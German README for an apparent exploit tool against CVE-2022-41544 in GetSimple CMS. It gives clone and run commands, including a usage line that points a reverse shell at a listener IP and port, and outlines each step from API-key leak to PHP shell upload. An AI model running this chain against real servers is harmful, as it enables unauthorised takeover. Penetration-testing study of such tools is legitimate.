
Python-Exploit-Skript für CVE-2022-41544 in GetSimple CMS. Automatisiert API-Schlüssel-Leck, CSRF-Token-Extraktion, PHP-Shell-Upload und Reverse-Shell-Auslösung für Penetrationstests.
Dieses Repository enthält ein Skript zur Ausnutzung der Schwachstelle CVE-2022-41544 in GetSimple CMS. Das Skript führt mehrere Schritte aus, um Schwachstellen zu überprüfen, API-Schlüssel zu extrahieren, Cookies zu setzen, CSRF-Token zu erhalten, eine Shell hochzuladen und die Shell auszulösen.
telnetlib-Imports, da er für die Funktionalität des Skripts nicht erforderlich war.Repository klonen:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
Abhängigkeiten installieren:
Stellen Sie sicher, dass Python 3 installiert ist, zusammen mit der requests-Bibliothek.
pip3 install requests
Skript ausführen:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: Die Zieldomain oder IP-Adresse.<path>: Der Pfad zur GetSimple CMS-Installation.<ip:port>: IP und Port für die Reverse Shell.<username>: Der Admin-Benutzername für GetSimple CMS.Beispiel:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): Zeigt einen stilisierten Banner mit ASCII-Art an.get_version(target, path): Überprüft, ob die Zielversion von GetSimple CMS verwundbar ist.api_leak(target, path): Versucht, einen API-Schlüssel aus einer Autorisierungs-XML-Datei zu extrahieren.set_cookies(username, version, apikey): Setzt Cookies, die für weitere Anfragen auf Basis des extrahierten API-Schlüssels erforderlich sind.get_csrf_token(target, path, headers): Extrahiert ein CSRF-Token, das zum Hochladen einer Shell benötigt wird.upload_shell(target, path, headers, nonce, shell_content): Lädt eine PHP-Shell auf den Zielserver hoch.shell_trigger(target, path): Löst die hochgeladene Shell aus, um eine Reverse-Shell-Verbindung herzustellen.Die main()-Funktion orchestriert den gesamten Prozess, indem sie die obigen Funktionen sequenziell aufruft, um die CVE-2022-41544-Sicherheitslücke auszunutzen.
Dieses Skript wurde entwickelt von h3x0v3rl0rd.
Dieses Skript dient ausschließlich zu Bildungszwecken. Unberechtigter Zugriff auf Systeme ist illegal und unethisch. Verwenden Sie dieses Skript verantwortungsbewusst und nur auf Systemen, für die Sie ausdrücklich die Erlaubnis zum Testen haben.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.